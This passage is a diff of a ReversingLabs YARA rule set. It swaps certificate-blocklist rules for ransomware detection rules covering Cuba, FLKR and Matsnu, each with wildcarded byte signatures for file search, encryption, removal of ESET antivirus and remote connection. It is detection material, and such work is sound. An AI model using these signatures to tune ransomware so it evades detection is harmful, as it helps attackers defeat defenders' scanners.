+            ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 8D ??
+            ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 7D ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A
+            ?? 6A ?? 6A ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digiwill Limited" and pe.signatures [ i ] . serial == "47:6d:e2:f1:08:d2:0b:43:ba:3b:ae:6f:33:1a:f8:f1" and 1588135722 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $uninstall_eset_av )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_08Ddcc67F8Cad6929607E4Cda29B3503 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cuba : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Cuba ransomware."
 		author = "ReversingLabs"
-		id = "3563547f-556b-56e3-ad25-cfec0294fe93"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "b2c81849-9fa6-58b6-b6fe-4d9a5f0923ea"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4234-L4250"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Cuba.yara#L1-L126"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4cd975312ca825b51f34f5c89184a56526877436224c1e7407d715b28ebfd9d5"
+		logic_hash = "0a8dea6e38a6407897b994ea119bc8b0712a94363b7b3942dcd32c65ee5548d4"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Cuba"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8B D7 8D 4D ?? E8 ??
+            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
+            0F B7 00 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
+            0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45
+            ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43
+            45 ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0
+            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D3 C6
+            45 ?? ?? 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D
+            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 55 ??
+            8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 8B 5D ?? 83 FB ?? 8B 7D ?? 8B 45 ?? 0F
+            43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ??
+            83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9
+            ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ??
+            ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1
+        }
+		$find_files_p2 = {
+            66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ??
+            8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75
+            ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8
+            ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75
+            ?? EB ?? 83 7D ?? ?? 75 ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 FA ?? 0F 43 C1 66 83 38 ??
+            75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66
+            83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 74 ?? 8B 8D ?? ?? ?? ??
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? C6 45 ?? ?? 83 FB ?? 72 ?? 8D 0C 5D ??
+            ?? ?? ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 83 C0 ?? 83 F8 ?? 0F
+            87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
+            9D ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
+            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
+            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 55 ?? C7 45
+            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15
+        }
+		$enum_resources = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B DA 89 5D ?? 8D 45 ?? C7 45 ?? ?? ??
+            ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 32
+            C0 E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 66 90
+            FF 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 83 7E ?? ?? 0F 85
+            ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 56 ?? 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 58 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C3 8D 4D
+            ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8B CB C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ??
+            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? 8B D3 E8 ?? ?? ?? ?? 47
+            83 C6 ?? 3B 7D ?? 0F 82 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 7D ?? 0F 57 C0 66 0F 13 45 ??
+            C7 45 ?? ?? ?? ?? ?? 8B C7 83 7F ?? ?? 72 ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 75 ?? FF 15 ?? ??
+            ?? ?? 32 DB E9 ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74
+            ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8E ?? ?? ?? ?? 6A ?? 8D
+            41 ?? 50 6A ?? 8D 56 ?? 51 52 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 53 FF 15
+            ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 8D 45 ?? 8B CE
+            50 E8 ?? ?? ?? ?? EB ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 6A ?? EB ?? 6A ?? 8D
+            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 75 ?? 8A D8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 83
+            CE ?? 89 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ??
+            83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 83 7F ?? ?? 72 ?? 8B 3F 50 57 FF 15 ?? ??
+            ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ??
+            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
+            ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? CC CC CC 55 8B EC 83 E4 ?? 81 EC
+        }
+		$encrypt_files_p2 = {
+            A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B 5D ?? 56 57 8B F9 89 5C 24 ?? 6A ??
+            8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 8B 17 8B 47 ?? 2B C2 50 52 FF 33 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33
+            CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 44 24 ?? 8B 57 ?? 8B 0F 89 44 24 ?? 89 54 24
+            ?? 89 4C 24 ?? 85 C0 7E ?? 8B D8 8B 47 ?? 8B F3 2B 47 ?? 3B D8 52 0F 43 F0 8D 47 ??
+            56 51 50 E8 ?? ?? ?? ?? 56 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 2B DE
+            8B 54 24 ?? 03 CE 83 C4 ?? 89 4C 24 ?? 85 DB 7F ?? 8B 5C 24 ?? 6A ?? 6A ?? 0F 57 C0
+            66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 33 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
+            85 C0 75 ?? FF D6 89 43 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ??
+            89 44 24 ?? 8D 87 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 4C 24 ?? ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 89 43 ?? 6A ?? 8D 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF 37 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ??
+            FF D6 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+            ?? ?? 8B 8C 24 ?? ?? ?? ?? B0 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "08:dd:cc:67:f8:ca:d6:92:96:07:e4:cd:a2:9b:35:03" and 1564310268 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_052242Ace583Adf2A3B96Adcb04D0812 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_FLKR : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects FLKR ransomware."
 		author = "ReversingLabs"
-		id = "22104929-e2c5-565c-975c-826f666e78e2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7f3abcd0-8dfa-5914-9ad0-566c16c2e2ab"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4252-L4268"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.FLKR.yara#L1-L71"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e1593a2bf375912e411d5f19d9e232c6b87f0897bb6f1c0b0539380b34b05af5"
+		logic_hash = "4ab00ba82baceec9899556d3a774ec08c83c10930cec194e18e3b4e16ebacb58"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "FLKR"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_and_encrypt_p1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 8B BC 24 ??
+            ?? ?? ?? 57 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 44
+            24 ?? FF D5 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 54 24 ?? 52 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51
+            57 C6 04 07 ?? FF D5 F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84
+            C0 0F 85 ?? ?? ?? ?? 8A 0F 33 D2 84 C9 74 ?? BE ?? ?? ?? ?? 8B C7 2B F7 88 0C 06 8A
+            48 ?? 40 42 84 C9 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 82 ?? ?? ?? ?? ?? C6 82 ??
+            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6
+            74 ?? 56 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? 57 FF D5 57 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 38 44 24 ?? 74
+        }
+		$search_and_encrypt_p2 = {
+            40 80 7C 04 ?? ?? 75 ?? 8A 4C 04 ?? 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 80 7C 04 ??
+            ?? 75 ?? 80 7C 04 ?? ?? 74 ?? 80 F9 ?? 75 ?? B3 ?? 38 5C 04 ?? 75 ?? 80 7C 04 ?? ??
+            75 ?? 80 7C 04 ?? ?? 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 05 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? FF 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? B3 ?? B2 ?? 80 F9 ?? 75 ?? 38 5C 04 ?? 75
+            ?? 80 7C 04 ?? ?? 75 ?? 38 5C 04 ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
+            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 75 ?? 32 D2 80 F9 ?? 75 ?? 80 7C 04 ?? ?? 75 ??
+            80 7C 04 ?? ?? 75 ?? 80 7C 04 ?? ?? 0F 84 ?? ?? ?? ?? 84 D2 0F 84 ?? ?? ?? ?? 8A 0F
+            33 D2 84 C9 74 ?? 8D B4 24 ?? ?? ?? ?? 8B C7 2B F7 8D A4 24 ?? ?? ?? ?? 88 0C 06 8A
+            48 ?? 40 42 84 C9 75 ?? A1 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 0F B6
+            05 ?? ?? ?? ?? C6 84 14 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? 33 C0 6A ?? 89 8C 24 ?? ?? ?? ?? 89 94 24 ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 88 84 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 68 ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 0D ??
+            ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B E8 A1 ?? ?? ?? ?? 89 8C 24 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 89 84 24 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? 66 8B 15 ?? ?? ??
+            ?? 89 8C 24 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 8D 74 24 ?? 89 6C 24 ?? 66 89
+        }
+		$search_and_encrypt_p3 = {
+            94 24 ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ??
+            52 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
+            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 56
+            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50
+            8D 84 24 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A
+            ?? 51 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? FF 05 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 2B F0 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 03
+            C6 50 8D 8C 24 ?? ?? ?? ?? 51 8B D1 52 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? FF 05 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 55 E8 ?? ??
+            ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8B 74 24 ?? 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 56 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAN-CHAI, TOV" and pe.signatures [ i ] . serial == "05:22:42:ac:e5:83:ad:f2:a3:b9:6a:dc:b0:4d:08:12" and 1573603200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $search_and_encrypt_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Bebef5C533Ce92Efc402Fab8605C43Ec : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Matsnu : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Matsnu ransomware."
 		author = "ReversingLabs"
-		id = "59d3dd01-47bc-59ee-8fe7-fd5b1af8f9f4"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "2f0bddd5-bd48-5d38-84f4-2dbccbe04a46"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4270-L4288"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Matsnu.yara#L1-L116"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "daa57ad622799467c60693060e6c9eea18bdf0bb26f178e8b03453aab486ccf4"
+		logic_hash = "76ef1b4a292f27ccd904e80f0279a7a327f7399a21f2266ef3ea959e5339ffac"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Matsnu"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO VEKTOR" and ( pe.signatures [ i ] . serial == "00:be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" or pe.signatures [ i ] . serial == "be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" ) and 1587513600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_1D3F39F481Fe067F8A9289Bb49E05A04 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "0c4b6efb-c793-5505-bcd6-f62266c984c6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4290-L4306"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2fdf8b59d302d2ce81a1e9a5715138adc1ec45bd86871c4c2e46412407e329f9"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection = {
+            55 89 E5 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C6 45 ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5B 8D 83 ?? ?? ?? ?? 8B 00 6A ?? 50
+            FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D 7D ?? 57 56 FF 93 ?? ?? ?? ?? 85 C0 74
+            ?? 57 8D BB ?? ?? ?? ?? 89 07 5F EB ?? 8D B3 ?? ?? ?? ?? 8B 36 57 8D BB ?? ?? ?? ??
+            89 37 5F 68 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? EB ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? 57 FF 93 ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 8B 36 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
